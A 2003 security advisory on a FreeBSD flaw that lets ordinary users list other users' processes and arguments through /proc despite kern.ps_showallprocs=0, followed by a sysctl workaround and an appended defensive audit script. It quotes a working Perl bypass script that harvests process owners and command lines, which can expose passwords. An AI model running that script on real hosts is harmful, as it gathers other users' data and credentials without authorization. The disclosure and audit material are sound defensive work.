8th Jan 2003 [SBWID-5919]
COMMAND
ps information leak in FreeBSD
SYSTEMS AFFECTED
All FreeBSD ?
PROBLEM
Replying to a post originally by "cache", Jez Hancock comments:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;
This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained by
regular users even with the sysctl flag 'kern.ps_showallprocs' set
simply by looking at the contents of /proc. The following script was
also posted by someone to demonstrate this:
#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill. its basically an output format]
#
# Tested on FreeBSD 4.5-RC.
print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
    if(${proc}=~/[0-9]/o){
        unshift(@pids, ${proc});
    }
}
foreach $pid (@pids){
    open(FD, "ls -al /proc/$pid/file|");
    while(<FD>){
        chomp;
        ${l}=$_;
        ${l}=~s/\s{1,}/ /g;
        if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
            &ppid(${1},${2},${pid},${3});
        }
    }
    close(FD);
}
exit(0);
sub ppid(){
    (${a},${b},${c},${d})=@_;
    undef(${str});
    undef(${line});
    if(-e "/proc/$c/cmdline"){
        open(heh,"cat /proc/$c/cmdline|");
        @hah=<heh>;
        @chars=split(//,@hah[0]);
        foreach ${chr} (@chars){
            if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
                ${str}.=" ";
            }else{
                ${str}.=${chr};
            }
        }
        ${line}.=${a};
        while(length(${line})<11){${line}.=" ";} #alignment...
        ${line}.=" ".${b};
        while(length(${line})<23){${line}.=" ";}
        ${line}.=" ".${c};
        while(length(${line})<31){${line}.=" ";}
        chop(${str});
        if(${d}eq"unknown"){
            ${str}=~s/\s{1,}//g;
            ${line}.=" ("."${str}".")";
        }else{
            ${line}.=" "."${str}";
        }
        @line=split(//,${line});
        if(length(${line})>80){
            ${cntr}=0;
            foreach ${char} (@line){
                if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
                    print "\n"." "x32; #^Anything >, deal with the rollover.
                }
                print "${char}";
                ${cntr}++;
            }
            print "\n";
        }
        else{
            print "${line}\n";
        }
        return(0);
    }
}
I believe someone (last poster in this thread?) also posted a patch on
the same list, freebsd-security.
It's annoying in that I see a lot of users running mysql with the -u
and -p options:
mysql -u user -p mypassword
on the commandline, thinking that this info will not show up in ps
listings when ps is run by other users. Ho hum...
SOLUTION
Workaround Update (09 January 2003)
==========
Sean Kelly [smkelly@zombie.org] [http://www.zombie.org] says :
FreeBSD also has a sysctl knob which will protect against this.
(2) root:~$ sysctl kern.ps_argsopen=0
kern.ps_argsopen: 1 -> 0
This will prevent exactly the problem you describe, by making arguments
not viewable to other users (excluding root). It also appears to take
effect in /proc, such as /proc/<pid>/cmdline.
This is present in FreeBSD 4.7-STABLE, at least.
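
Added example, not part of the original advisory or of the posts it quotes: a small audit that reports which of the two sysctl knobs named above are still open, and which mysql-family clients in a ps listing were started with a password on the command line. The function names, the argument patterns and the sample data are assumptions made for this example.

```sh
#!/bin/sh
# Added example, not from the advisory. Input is read from stdin so the
# checks can be run against saved output as well as a live host.

# Print each process-visibility knob that is still non-zero (open).
open_knobs() {
    # Accept both "name: value" and "name=value" sysctl output styles.
    awk -F'[:=] *' '
        $1 == "kern.ps_showallprocs" || $1 == "kern.ps_argsopen" {
            if ($2 + 0 != 0) print $1
        }'
}

# From "USER PID COMMAND..." lines, print USER PID COMMAND for mysql-family
# clients started with a password argument. The patterns are heuristics
# assumed for this example; the secret itself is never printed.
exposed_args() {
    awk '
        NR == 1 && $1 == "USER" { next }        # skip the ps header
        {
            cmd = $3; sub(/.*\//, "", cmd)      # basename of the command
            if (cmd !~ /^mysql/) next
            hit = 0
            for (i = 4; i <= NF; i++) {
                if ($i ~ /^--password=./) hit = 1            # --password=X
                else if ($i ~ /^-p./) hit = 1                # -pX
                else if ($i == "-p" && i < NF && $(i+1) !~ /^-/) hit = 1
            }
            if (hit) print $1, $2, $3
        }'
}

# Constructed sample input (not captured from a real host).
SAMPLE_SYSCTL='kern.ps_showallprocs: 0
kern.ps_argsopen: 1'
SAMPLE_PS='USER PID COMMAND
alice 411 mysql -u user -p mypassword
bob 502 /usr/local/bin/mysqldump --password=x db
carol 610 mysql -u carol -p
dave 733 ssh -p 2222 host'

printf '%s\n' "$SAMPLE_SYSCTL" | open_knobs
printf '%s\n' "$SAMPLE_PS" | exposed_args

# On a FreeBSD release that has these knobs (as root, so all arguments show):
#   sysctl kern.ps_showallprocs kern.ps_argsopen | open_knobs
#   ps -axo user,pid,command | exposed_args
```

A bare trailing -p (the client prompts for the password) is not flagged, since nothing secret reaches the argument list.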